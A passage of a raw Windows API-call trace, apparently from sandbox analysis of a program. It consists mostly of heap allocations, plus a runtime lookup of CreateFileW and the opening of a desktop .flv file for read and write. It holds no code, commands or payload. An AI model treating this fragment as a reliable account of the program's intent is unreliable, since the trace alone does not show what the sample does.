[0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.582] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0162.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0162.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0162.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0162.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0162.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.585] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.589] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0162.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.590] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0x9d2928 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0162.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0162.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkicocoalm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0162.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0162.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0162.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0163.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0163.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d2928 | out: hHeap=0x8a0000) returned 1 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0163.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: 